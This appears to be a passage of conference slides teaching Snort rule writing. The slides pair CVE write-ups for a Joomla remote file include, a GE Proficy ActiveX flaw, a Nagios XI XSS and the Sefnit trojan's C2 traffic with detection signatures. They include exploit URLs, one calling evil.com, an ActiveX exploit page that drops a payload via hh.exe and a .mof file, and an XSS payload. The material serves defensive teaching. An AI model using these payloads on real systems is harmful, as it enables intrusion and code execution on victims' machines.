  • 62. Remote File Include Overview CVE-2008-5053 Remote file include vulnerability in Joomla Simple RSS Reader allows execution of arbitrary PHP code via the parameter mosConfig_live_site in administrator/components/com_rssreader/admin.rssreader.php: include("$mosConfig_live_site/components/com_rssreader/about.html"); $mosConfig_live_site is obtained from the GET parameter of the same name sent to admin.rssreader.php. Exploit: http://site/joomlapath/administrator/components/com_rssreader /admin.rssreader.php?mosConfig_live_site=http://evil.com/
  • 63. Remote File Include Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Joomla admin.rssreader.php remote file include attempt"; flow:to_server,established; content:"admin.rssreader.php"; fast_pattern:only; http_uri; content:"mosConfig_live_site="; nocase; http_uri; pcre:"/[?&]mosConfig_live_site=[^&]*?(http|ftp)/Ui"; metadata:service http; reference:cve,2008-5053; classtype:web-application-attack; )
  • 64. Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free > Remote File Include Browser Plugins Cross Site Scripting Malware Command Traffic
  • 65. Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include > Browser Plugins Cross Site Scripting Malware Command Traffic
  • 66. Browser Plugin Overview CVE-2012-2516 GE Proficy Historian's KeyHelp.ocx ActiveX control adds HTML Help functionality for the Proficy enterprise data collection system. It can be instantiated in a web page using the <object> tag, for example: <object id="ctrl" classid="clsid:45e66957-2932-432a-a156-31503df0a681"> Or using Javascript: obj = new ActiveXObject("KeyHelp.KeyScript")
  • 67. Browser Plugin Overview The API of this ActiveX object exposes several methods including LaunchTriPane(), which has the following prototype: Void LaunchTriPane(System.string ChmFile) The function LaunchTriPane will use ShellExecute to launch hh.exe, with user controlled data as parameters: > HH.EXE -decompile D:/destination-folder C:/test.chm This can be abused to write arbitrary files. Code execution is possible by uploading a WMI .mof file.
  • 68. Browser Plugin Disassembly KeyHelp.ocx: 5D335165 CALL KeyHelp.5D31797F 5D33516A JMP SHORT KeyHelp.5D33517D 5D33516C PUSH 5 5D33516E PUSH EDI 5D33516F PUSH ESI ; Malicious command line parameters - no validation 5D335170 PUSH KeyHelp.5D347950 ; ASCII "hh.exe" 5D335175 PUSH EDI 5D335176 PUSH EDI 5D335177 CALL SHELL32.ShellExecuteA ; run hh.exe with malicious params 5D33517D CMP ESI,EDI 5D33517F JE SHORT KeyHelp.5D335187 5D335181 PUSH ESI
  • 69. Browser Plugin Exploit <html> <body><script> KeyScript = new ActiveXObject("KeyHelp.KeyScript"); ChmPayloadFile = "-decompile C:WINDOWSsystem32 "+ "172.16.211.11A5vTb1QLAqfifDoixwWS.chm"; ChmMofFile = "-decompile c:WINDOWSsystem32wbemmof "+ "172.16.211.11A5vTb1QLAqfifQLQklKr.chm"; KeyScript.LaunchTriPane(ChmPayloadFile); setTimeout('KeyScript.LaunchTriPane(ChmMofFile);',3000); </script></body> </html>
  • 70. Browser Plugin Detection # # <OBJECT> Detection # alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; flow:to_client,established; file_data; content:"45E66957-2932-432A-A156-31503DF0A681"; fast_pattern:only; content:"LaunchTriPane"; nocase; metadata:policy security-ips drop, service http; reference:cve,2012-2516; classtype:attempted-user; )
  • 71. Browser Plugin Detection # # Javascript Detection # alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"BROWSER-PLUGINS GE Proficy Historian KeyHelp ActiveX clsid access attempt"; flow:to_client,established; file_data; content:"KeyHelp.KeyScript"; fast_pattern:only; content:"LaunchTriPane"; nocase; metadata:policy security-ips drop, service http; reference:cve,2012-2516; classtype:attempted-user; )
  • 72. Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include > Browser Plugins Cross Site Scripting Malware Command Traffic
  • 73. Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins > Cross Site Scripting Malware Command Traffic
  • 74. Cross Site Scripting (XSS) Overview OSVDB-89893 Cross-Site Scripting vulnerability in Nagios XI's Alert Cloud due to insufficient sanitization of ‘width’ and ‘height’ parameters sent to the URI: /includes/components/alertcloud/index.php Exploit: /nagiosxi/includes/components/alertcloud/index.php?height=4"}}; alert('XSS'); var aa={"A":{"B":"
  • 75. Cross Site Scripting (XSS) Detection alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Nagios XI alert cloud cross site scripting attempt"; flow:to_server,established; content:"/includes/components/alertcloud/index.php"; fast_pattern:only; http_uri; pcre:"/[?&](height|width)=[^&]*?([x22x27x3cx3ex28x29]|script|onload|src)/Ui"; metadata:service http; reference:url,osvdb.org/show/osvdb/89893; classtype:web-application-attack; )
  • 76. Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins > Cross Site Scripting Malware Command Traffic
  • 77. Detection Topics Buffer Overflow Command Injection Directory Traversal Use-After-Free Remote File Include Browser Plugins Cross Site Scripting > Malware Command Traffic
  • 78. Malware Sample Overview Win.Trojan.Sefnit Upon execution Win.Trojan.Sefnit drops a service to %AppData%Updaterupdater.dll and starts it. When the service updater.dll starts it attempts to read tasks from the configuration file %AppData%Updater/~conf.dat Initially the conf.dat file doesn't exist. The sample obtains the Disk Volume Serial number and appends it to the MachineGUID. This string is then encrypted. The sample uses 16 bytes of the encrypted value and converts it to a 32 character hex string and uses this string as a UUID sent in the initial request to C2: GET /j/20a0b8237d5b084e46bd673e26d948bf/0001 HTTP/1.1 Host: axnlze.net Accept: */* The URI above has the following hardcoded format: hxxp://<c2domain>/j/<uuid>/<version>
  • 79. Malware Sample Disassembly 10015B27 PUSH 10112E28 ; /Arg1 = UNICODE ;"c2.net/j/<uuid>/<version>" 10015B2C LEA ECX,DWORD PTR SS:[EBP-4C] ; | 10015B2F CALL <_wcslen-copystr> ; updater.10001BA4 10015B34 MOV BYTE PTR SS:[EBP-4],1 10015B38 MOV EDI,10112E14 ; UNICODE "<uuid>" 10015B3D PUSH EDI ; /Arg1 => 10112E14 10015B3E CALL <_wcslen> ; updater.100196E1 ... 10015BBB PUSH ESI ; UNICODE "<version>" 10015BBC LEA ECX,DWORD PTR SS:[EBP-4C] 10015BBF CALL <substr_loc> 10015BC4 MOV DWORD PTR SS:[EBP-1DC],EAX 10015BCA PUSH ESI ; UNICODE "<version>" 10015BCB CALL <_wcslen> 10015BD0 MOV DWORD PTR SS:[EBP-1EC],EAX 10015BD6 MOV EDI,10112E08 ; UNICODE "0001" ... 1005A043 PUSH 0 ; /Arg4 = 00000000 1005A045 PUSH ECX ; |Arg3 = 008DAA60 ASCII ; "/j/20a0b8237d5b084e46bd673e26d948bf/0001" 1005A046 PUSH EBX ; |Arg2 = 1011B340 ASCII "GET" 1005A047 PUSH EDI ; |Arg1 008C9138 = NULL 1005A048 CALL 10058E00 ; updater.10058E00
  • 80. Malware Command Traffic Detection # # C2 request detection # # hardcoded urilen urilen:40,norm; # hardcoded uri pattern, begins with "/j/" content:"/j/"; depth:3; http_uri; # ends with "/0001" content:"/0001"; distance:32; within:5; http_uri; # no User-Agent in C2 request content:!"User-Agent"; http_header; # final verification of C2 URI pattern pcre:"/^x2fjx2f[a-f0-9]{32}x2f0001$/U";
  • 81. Malware Command Traffic Detection alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS ( msg:"MALWARE-CNC Win.Trojan.Sefnit variant outbound connection attempt"; flow:to_server,established; urilen:40,norm; content:"/j/"; depth:3; http_uri; content:"/0001"; within:5; distance:32; http_uri; content:!"User-Agent"; http_header; pcre:"/^x2fjx2f[a-f0-9]{32}x2f0001$/U"; metadata:impact_flag red, service http; classtype:trojan-activity; )
  • 82. Call to Action • Related sessions: • Introduction to Snort Rule Writing • Detection Strategies with Snort [DevNet-1126] • Visit the World of Solutions for • Cisco Campus • Walk in Labs • Technical Solution Clinics • Meet the Engineer - Available immediately after this talk.